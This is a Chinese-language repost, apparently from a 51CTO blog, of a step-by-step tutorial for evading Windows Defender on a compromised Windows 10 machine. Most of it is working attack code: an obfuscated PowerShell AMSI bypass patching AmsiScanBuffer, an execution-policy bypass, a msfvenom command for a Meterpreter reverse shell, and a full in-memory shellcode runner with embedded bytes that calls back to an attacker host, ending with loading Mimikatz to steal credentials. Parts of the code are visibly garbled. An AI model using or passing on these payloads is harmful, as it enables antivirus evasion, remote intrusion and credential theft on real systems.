久久久高清一区二区三区,欧美少妇xxxx,欧美精品久久久久久久久久

首頁 > 數碼 > 內容頁

世界新資訊：繞過 Windows Defender （最新版本）

2023-01-25 20:16:31 來源：51CTO博客

在本文中，將繞過 Windows Defender（最新版本），并詳細解釋每個步驟。

準備

- Windows 10 機器（目標機）- 已獲取目標機的低級特權帳戶- Linux機器（攻擊者）- Defender Anti-Virus 在發布本文時正在運行并且是最新的

Payload

Payload Runner:

[Ref].Assembly.GetType("System.Management.Automation.Amsi"+[char]85+"tils").GetField("ams"+[char]105+"InitFailed","NonPublic,Static").SetValue($null,$true)function LookupFunc {Param ($moduleName, $functionName)$assem = ([AppDomain]::CurrentDomain.GetAssemblies() |Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split("\\")[-1].Equals("System.dll") }).GetType("Microsoft.Win32.UnsafeNativeMethods")$tmp=@()$assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}$assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}@($moduleName)), $functionName))}function getDelegateType {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,[Parameter(Position = 1)] [Type] $delType = [Void])$type = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName("ReflectedDelegate")),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule("InMemoryModule", $false).DefineType("MyDelegateType", "Class, Public, Sealed, AnsiClass, AutoClass",[System.MulticastDelegate])$type.DefineConstructor("RTSpecialName, HideBySig, Public",[System.Reflection.CallingConventions]::Standard, $func).SetImplementationFlags("Runtime, Managed")$type.DefineMethod("Invoke", "Public, HideBySig, NewSlot, Virtual", $delType, $func).SetImplementationFlags("Runtime, Managed")return $type.CreateType()}$lpMem = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAlloc),(getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, 0x1000, 0x3000, 0x40)[Byte[]] $buf = [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $lpMem, $buf.length)$hThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateThread),(getDelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr],[UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero)[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll WaitForSingleObject),(getDelegateType @([IntPtr], [Int32])([Int]))).Invoke($hThread, 0xFFFFFFFF)

AMSI 繞過（Windows反惡意軟件掃描接口）

$xudbk = @"using System;using System.Runtime.InteropServices;public class xudbk {[DllImport("kernel32")]public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);[DllImport("kernel32")]public static extern IntPtr LoadLibrary(string name);[DllImport("kernel32")]public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr pbsxld, uint flNewProtect, out uint lpflOldProtect);}"@Add-Type $xudbk$wvyfoqc = [xudbk]::LoadLibrary("$(("amsì."+"dll").nOrMALIZe([cHAR](70)+[ChAR]([BYTE]0x6f)+[CHAr](114)+[ChAR]([byTe]0x6d)+[CHAR](68*12/12)) -replace [Char](92+19-19)+[cHar]([ByTe]0x70)+[cHaR](123+15-15)+[chAR](77)+[Char](110*102/102)+[cHar]([BytE]0x7d))")$dhdzwx = [xudbk]::GetProcAddress($wvyfoqc, "$(("ámsìSc?nBu"+"ffer").NorMAlIZE([chaR]([byTE]0x46)+[chAR](111)+[char]([Byte]0x72)+[chAR]([BYtE]0x6d)+[CHar]([byTE]0x44)) -replace [cHar]([BYTe]0x5c)+[CHAr](112)+[cHAR]([bytE]0x7b)+[char]([bytE]0x4d)+[ChAR](110)+[CHAR](125+4-4))")$p = 0[xudbk]::VirtualProtect($dhdzwx, [uint32]5, 0x40, [ref]$p)$qbzv = "0xB8"$dnyd = "0x57"$ttvz = "0x00"$xcoe = "0x07"$vslp = "0xC3"$dcios = [Byte[]] ($qbzv,$dnyd,$ttvz,$xcoe,+$dlsl,+$vslp)[System.Runtime.InteropServices.Marshal]::Copy($dcios, 0, $dhdzwx, 6)

執行策略繞過

Set-ExecutionPolicy Unrestricted -Scope CurrentUser

生成 Payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=443 EXITFUNC=thread -f powershell

前提

在目標機器上獲取了一個低權限用戶，目標機器正在使用 Windows Defender，所有保護措施都已到位，但下一步是執行多個腳本和枚舉工具以找到特權升級向量，但 Windows Defender 阻止了所有嘗試。

(資料圖)

為此，必須找到一種規避技術，可以通過本文了解該技術。

繞過過程

繞過執行策略繞過反惡意軟件掃描接口 (AMSI)生成有效載荷創建 PowerShell 運行程序執行 PowerShell Runner，啟動最終有效負載

概念驗證 (PoC)

我們將在"test"用戶的上下文中工作，這是目標機器上的標準本地帳戶。

另外，檢查目標機器上的 Windows Defender 狀態：

Windows Defender 是最新的并且在啟用所有模塊的情況下運行。

首先，我們將在目標的機器上打開一個 PowerShell 終端，并將執行策略設置為不受限制，使用以下命令：

Set-ExecutionPolicy Unrestricted -Scope CurrentUser

接下來，我們將檢查反惡意軟件掃描接口 (AMSI) 是否到位。如果你想了解更多關于 AMSI 的內容，可以查看windows官方文檔。使用以下命令檢查 AMSI 是否正在運行："amsiutils"

如果顯示紅色警告信息，則表示它運行正常。

接下來，我們將嘗試通過將腳本（來自本文的"payload"部分）直接復制粘貼到我們的 PowerShell 控制臺來繞過 AMSI：

$xudbk = @"using System;using System.Runtime.InteropServices;public class xudbk {[DllImport("kernel32")]public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);[DllImport("kernel32")]public static extern IntPtr LoadLibrary(string name);[DllImport("kernel32")]public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr pbsxld, uint flNewProtect, out uint lpflOldProtect);}"@Add-Type $xudbk$wvyfoqc = [xudbk]::LoadLibrary("$(("amsì."+"dll").nOrMALIZe([cHAR](70)+[ChAR]([BYTE]0x6f)+[CHAr](114)+[ChAR]([byTe]0x6d)+[CHAR](68*12/12)) -replace [Char](92+19-19)+[cHar]([ByTe]0x70)+[cHaR](123+15-15)+[chAR](77)+[Char](110*102/102)+[cHar]([BytE]0x7d))")$dhdzwx = [xudbk]::GetProcAddress($wvyfoqc, "$(("ámsìSc?nBu"+"ffer").NorMAlIZE([chaR]([byTE]0x46)+[chAR](111)+[char]([Byte]0x72)+[chAR]([BYtE]0x6d)+[CHar]([byTE]0x44)) -replace [cHar]([BYTe]0x5c)+[CHAr](112)+[cHAR]([bytE]0x7b)+[char]([bytE]0x4d)+[ChAR](110)+[CHAR](125+4-4))")$p = 0[xudbk]::VirtualProtect($dhdzwx, [uint32]5, 0x40, [ref]$p)$qbzv = "0xB8"$dnyd = "0x57"$ttvz = "0x00"$xcoe = "0x07"$vslp = "0xC3"$dcios = [Byte[]] ($qbzv,$dnyd,$ttvz,$xcoe,+$dlsl,+$vslp)[System.Runtime.InteropServices.Marshal]::Copy($dcios, 0, $dhdzwx, 6)

再次執行 "amsiutils" ，你會看到紅色警告不再顯示，這表明AMSI 已被禁用。

現在使用 MSFVenom 在攻擊機中生成一個 Meterpreter 有效負載。使用一個公共端口，例如 443，以繞過任何適當的防火墻規則，并可能避免生成任何警報。

我們將生成的有效載荷復制粘貼到我們的目標器中（可以在文章開頭的"payload"部分找到），我們將得到最終版本：

[Ref].Assembly.GetType("System.Management.Automation.Amsi"+[char]85+"tils").GetField("ams"+[char]105+"InitFailed","NonPublic,Static").SetValue($null,$true)function LookupFunc {Param ($moduleName, $functionName)$assem = ([AppDomain]::CurrentDomain.GetAssemblies() |Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split("\\")[-1].Equals("System.dll") }).GetType("Microsoft.Win32.UnsafeNativeMethods")$tmp=@()$assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}$assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}@($moduleName)), $functionName))}function getDelegateType {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,[Parameter(Position = 1)] [Type] $delType = [Void])$type = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName("ReflectedDelegate")),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule("InMemoryModule", $false).DefineType("MyDelegateType", "Class, Public, Sealed, AnsiClass, AutoClass",[System.MulticastDelegate])$type.DefineConstructor("RTSpecialName, HideBySig, Public",[System.Reflection.CallingConventions]::Standard, $func).SetImplementationFlags("Runtime, Managed")$type.DefineMethod("Invoke", "Public, HideBySig, NewSlot, Virtual", $delType, $func).SetImplementationFlags("Runtime, Managed")return $type.CreateType()}$lpMem = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAlloc),(getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, 0x1000, 0x3000, 0x40)[Byte[]] $buf = 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x51,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x56,0x4d,0x31,0xc9,0x48,0xf,0xb7,0x4a,0x4a,0x48,0x8b,0x72,0x50,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x66,0x81,0x78,0x18,0xb,0x2,0xf,0x85,0x72,0x0,0x0,0x0,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x8b,0x48,0x18,0x50,0x44,0x8b,0x40,0x20,0x49,0x1,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x1,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x3,0x4c,0x24,0x8,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x1,0xd0,0x66,0x41,0x8b,0xc,0x48,0x44,0x8b,0x40,0x1c,0x49,0x1,0xd0,0x41,0x8b,0x4,0x88,0x41,0x58,0x41,0x58,0x5e,0x59,0x48,0x1,0xd0,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x0,0x0,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x1,0x0,0x0,0x49,0x89,0xe5,0x49,0xbc,0x2,0x0,0x1,0xbb,0xc0,0xa8,0x3,0x4,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x7,0xff,0xd5,0x4c,0x89,0xea,0x68,0x1,0x1,0x0,0x0,0x59,0x41,0xba,0x29,0x80,0x6b,0x0,0xff,0xd5,0x6a,0xa,0x41,0x5e,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0xf,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0xa,0x49,0xff,0xce,0x75,0xe5,0xe8,0x93,0x0,0x0,0x0,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,0x6a,0x4,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7e,0x55,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,0x41,0x59,0x68,0x0,0x10,0x0,0x0,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31,0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7d,0x28,0x58,0x41,0x57,0x59,0x68,0x0,0x40,0x0,0x0,0x41,0x58,0x6a,0x0,0x5a,0x41,0xba,0xb,0x2f,0xf,0x30,0xff,0xd5,0x57,0x59,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x49,0xff,0xce,0xe9,0x3c,0xff,0xff,0xff,0x48,0x1,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xb4,0x41,0xff,0xe7,0x58,0x6a,0x0,0x59,0xbb,0xe0,0x1d,0x2a,0xa,0x41,0x89,0xda,0xff,0xd5[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $lpMem, $buf.length)$hThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateThread),(getDelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr],[UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero)[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll WaitForSingleObject),(getDelegateType @([IntPtr], [Int32])([Int]))).Invoke($hThread, 0xFFFFFFFF)

我們將使用 Metasploit 在攻擊機中啟動我們的偵聽器。

最后，讓我們將運行程序直接復制粘貼到受害者機器的 PowerShell 控制臺中。

查看handler

拿到shell !!!

只需 5 個簡單的步驟，我們就能夠在所有模塊都啟動并運行的情況下繞過 Windows Defender。

讓我們嘗試在我們的 meterpreter shell 中運行 Mimikatz（通常會立即被 Defender 拒絕）。

load 成功!

關注公眾號，內容更精彩：

標簽：惡意軟件運行程序的情況下